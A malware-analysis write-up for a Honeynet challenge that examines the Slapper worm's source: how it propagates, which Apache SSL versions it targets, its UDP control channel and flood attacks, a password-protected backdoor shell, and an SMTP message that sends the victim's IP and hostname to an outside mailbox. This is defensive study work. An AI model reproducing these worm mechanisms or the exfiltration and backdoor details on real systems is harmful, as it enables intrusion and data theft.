This scan of the month challenge requires source code analysis of a worm captured by Honeynet BR. As this challenge requires only source analysis, I used Cygwin running under Windows, rather than a complete GNU/Linux distribution.
After downloading the .unlock file, I checked the two check sums provided
$ md5sum .unlock a03b5be9264651ab30f2223592befb42 *.unlock $ sha1sum .unlock 4b018cdfdbcf71ddaa789e8ecc9ed7700660021a *.unlock
They both matched.
I refer to line numbers a lot in this document. I generated two files, unlock_nl.c and update_nl.c, line numbered versions of .unlock.c and .update.c respectively, to help the casual reader, using the GNU nl command
$ nl -ba .unlock.c > unlock_nl.c $ nl -ba .update.c > update_nl.c
A first use of the file command showed that .unlock was a gzip file, generated September 20 2002.
$ file .unlock .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 11:59:04 2002, os: Unix
Unzipping it, and using file again, the uncompressed file was shown to be a GNU tar archive
$ gzip -dc unlock.gz > unlock $ file unlock unlock: GNU tar archive
A quick check with tar prior to decompression revealed two files, dated at a similar time to the archive (although .unlock.c appears to have been created after the gzip file, for some reason). These were then extracted.
$ tar tvf unlock -rw-r--r-- root/wheel 70981 2002-09-20 14:28:11 .unlock.c -rw-r--r-- root/wheel 2792 2002-09-19 22:57:48 .update.c $ tar xf unlock
The comments at the head of .unlock.c show that the worm was mostly written by contem@efnet, with modifications by aion@ukr.net, who also appears to have written .update.c
The worm appears to have been created at 14:28 on 20 September 2002. This is not compatible with the date of the last modification of the gzip file, which was apparently created earlier at 11.59. For some reason, the time stamp of one or both of the files must have been altered at some point.
The worm uses httpd as process name:
78 #define PSNAME "httpd "
1805 strcpy(argv[0],PSNAME);
The following answer is deduced from lines 1416-1428.
The worm copies itself as /tmp/.unlock.uu, created in uuencoded format from /tmp/unlock. Once copied, the file is decoded, as /tmp/.unlock. The /tmp/.unlock is then extracted using tar -xzf, to create the .unlock.c and .update.c files. These are compiled into http and update respectively, and both are started. All of these files are then removed, with the exception of /tmp/.unlock, which will be used for the next propagation.
Scans are performed on port 80 (SCANPORT) in lines 1908-1937, looking for a listening port. If the port is listening, the exploit function is called, which checks whether an Apache server is found on port 80, and whether the Apache version and operating systems match one of those in the list below - if so, the Apache SSL exploit is performed.
Exploits Apache SSL vulnerability (see references), on the following (taken from the architectures struct in lines 1241-1269):
| OS | Apache versions |
|---|---|
| Gentoo | |
| Debian | 1.3.26 |
| Red-Hat | 1.3.6, 1.3.9, 1.3.12, 1.3.19, 1.3.20, 1.3.22, 1.3.23, 1.3.26 |
| SuSE | 1.3.12, 1.3.17, 1.3.19, 1.3.20, 1.3.23 |
| Mandrake | 1.3.14, 1.3.19, 1.3.20, 1.3.23 |
| Slackware | 1.3.26 |
The mailme function (lines 94-130 of .update.c) creates a sendmail session with freemail.ukr.net containing the following:
helo test mail from: test@microsoft.com rcpt to: aion@ukr.net data hostid: <host ip> hostname: <hostname> att_from: <controller machine>
Translated, this sends an email to aion@ukr.net, purportedly from test@microsoft.com, giving the ip address and hostname of the computer, as well as the machine with which it is communicating (the 1st argument (argv[1]) given to the executable).
The worm communicates on port 4156 (PORT) over UDP - this can be seen in the calls to audp_listen, audp_send, audp_relay, audp_recv, audp_setup and audp_close functions from main, combined with an examination of those functions (just to check they actually do what their names suggest).
A brief summary of the audp_* functions are detailed below:
| function | Description | Line numbers |
|---|---|---|
| audp_listen | Creates a udp socket inst listening on port | 589-613 |
| audp_setup | Creates a udp socket inst connected to host on port | 615-641 |
| audp_send | Sends buffer buf of length len through socket inst | 662-681 |
| audp_recv | Recieves buffer into buf of length len from client through socket inst | 693-712 |
| audp_relay | Clones parent socket, connects to host on port | 643-660 |
| audp_close | Closes socket inst | 714-724 |
Three attack methods are TCP flood (lines 2246-2277), TCP flood over IPv6 (2279-2306) and DNS flood (2308-2385). Also included is a UDP flood (2205-2245).
.update.c compiles to an executable that runs as update, listens on port 1052 for a connection. If a connection is made, it checks the password against aion1981, and if the password matches, provides a shell.
UPTIME is used in the for loop so that the program will listen for 10 seconds at a time, before sleeping for SLEEPTIME (5 minutes)
While researching the Apache SSL vulnerabilities, it became clear that this worm was the linux.slapper worm. Two of the many references I found are available at: